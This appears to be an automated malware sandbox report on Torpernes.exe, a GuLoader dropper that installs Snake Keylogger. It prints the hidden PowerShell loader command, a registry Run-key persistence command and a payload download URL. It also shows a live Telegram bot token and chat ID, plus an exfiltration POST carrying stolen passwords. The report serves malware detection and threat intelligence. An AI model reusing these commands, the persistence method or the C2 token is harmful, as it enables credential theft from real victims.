
Windows Analysis Report
Torpernes.exe

Overview

General Information

Sample name: Torpernes.exe
Analysis ID: 1481480
MD5: ecc4ff0ee7d123f0e90587ea3a7b9ae3
SHA1: 70e6f747f9bae57619817beb11f836fa8a873726
SHA256: 1e0a46fd7b7b0706d4d5918ba666abdcccc67be4be89874b5cb2ca9ea8b12a83
Tags: exe

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Torpernes.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\Torpernes.exe" MD5: ECC4FF0EE7D123F0E90587EA3A7B9AE3)
    • powershell.exe (PID: 7440 cmdline: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Contentious.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Local\Temp\Contentious.exe" MD5: ECC4FF0EE7D123F0E90587EA3A7B9AE3)
        • cmd.exe (PID: 8012 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 8060 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage?chat_id=5811709821"}
Source: 00000006.00000002.2944378842.0000000021031000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_SnakeKeylogger; Description: Yara detected Snake Keylogger; Author: Joe Security
Source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security
Source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_SnakeKeylogger; Description: Yara detected Snake Keylogger; Author: Joe Security
Source: 00000006.00000002.2944378842.0000000020FAA000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_SnakeKeylogger; Description: Yara detected Snake Keylogger; Author: Joe Security
Source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_SnakeKeylogger; Description: Yara detected Snake Keylogger; Author: Joe Security

            System Summary

            Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)", CommandLine: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Torpernes.exe", ParentImage: C:\Users\user\Desktop\Torpernes.exe, ParentProcessId: 7408, ParentProcessName: Torpernes.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)", ProcessId: 7440, ProcessName: powershell.exe
            Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: %Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\crisscrossing
            Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8012, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)", ProcessId: 8060, ProcessName: reg.exe
            Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Contentious.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Contentious.exe, ParentProcessId: 7972, ParentProcessName: Contentious.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)", ProcessId: 8012, ProcessName: cmd.exe
            Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)", CommandLine: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Torpernes.exe", ParentImage: C:\Users\user\Desktop\Torpernes.exe, ParentProcessId: 7408, ParentProcessName: Torpernes.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)", ProcessId: 7440, ProcessName: powershell.exe
            No Snort rule has matched
            Timestamp:2024-07-25T09:56:55.795858+0200
            SID:2803305
            Source Port:49746
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-25T09:56:44.263078+0200
            SID:2803274
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-25T09:57:07.855040+0200
            SID:2853006
            Source Port:49753
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T09:56:49.886487+0200
            SID:2803274
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-25T09:56:51.785131+0200
            SID:2022930
            Source Port:443
            Destination Port:49742
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T09:56:47.794238+0200
            SID:2803305
            Source Port:49739
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-25T09:56:47.325602+0200
            SID:2803274
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-25T09:56:12.458951+0200
            SID:2022930
            Source Port:443
            Destination Port:49730
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T09:56:41.888830+0200
            SID:2803270
            Source Port:49736
            Destination Port:443
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-25T09:56:53.587006+0200
            SID:2803305
            Source Port:49744
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic


            AV Detection

            Source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage?chat_id=5811709821"}
            Source: Contentious.exe.7972.6.memstrmin; Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage"}
            Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            Source: unknown; DNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe; Code function: 6_2_238291E0 CryptUnprotectData,6_2_238291E0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe; Code function: 6_2_23829941 CryptUnprotectData,6_2_23829941
            Source: Torpernes.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.0
            Source: unknown; HTTPS traffic detected: 185.98.5.168:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
            Source: Torpernes.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ore.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006D84000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Torpernes.exe; Code function: 0_2_0040615C FindFirstFileW,FindClose,0_2_0040615C
            Source: C:\Users\user\Desktop\Torpernes.exe; Code function: 0_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004056A1
            Source: C:\Users\user\Desktop\Torpernes.exe; Code function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe; Code function: 6_2_0040615C FindFirstFileW,FindClose,6_2_0040615C
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe; Code function: 6_2_00402770 FindFirstFileW,6_2_00402770
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe; Code function: 6_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_004056A1
            Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\
            Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\
            Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\
            Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\
            Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\

            Networking

            Source: unknown; DNS query: name: api.telegram.org
            Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
            Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
            Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
            Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: POST /bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendDocument?chat_id=5811709821&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcad4b8239f5aa Host: api.telegram.org Content-Length: 547 Connection: Keep-Alive
            Source: Joe Sandbox View; IP Address: 149.154.167.220
            Source: Joe Sandbox View; IP Address: 188.114.96.3
            Source: Joe Sandbox View; IP Address: 158.101.44.242
            Source: Joe Sandbox View; ASN Name: TELEGRAMRU
            Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
            Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknown; DNS query: name: checkip.dyndns.org
            Source: unknown; DNS query: name: reallyfreegeoip.org
            Source: global traffic; HTTP traffic detected: GET /image/bwSNbczRiJIuD15.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: domzeleni.kz Cache-Control: no-cache
            Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
            Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
            Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
            Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.0
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | DNS traffic detected: DNS query: domzeleni.kz
            Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
            Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
            Source: unknown | HTTP traffic detected: POST /bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendDocument?chat_id=5811709821&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcad4b8239f5aa Host: api.telegram.org Content-Length: 547 Connection: Keep-Alive
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F6E000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020E99000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
            Source: powershell.exe, 00000001.00000002.2177929958.0000000006E21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
            Source: Torpernes.exe, Contentious.exe.1.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020EBD000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
            Source: powershell.exe, 00000001.00000002.2171178295.0000000004621000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.2171178295.0000000004621000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendDocument?chat_id=5811
            Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://domzeleni.kz/
            Source: Contentious.exe, 00000006.00000002.2943257213.00000000205A0000.00000004.00001000.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2928735040.0000000004A54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://domzeleni.kz/image/bwSNbczRiJIuD15.bin
            Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://domzeleni.kz/image/bwSNbczRiJIuD15.binB
            Source: powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
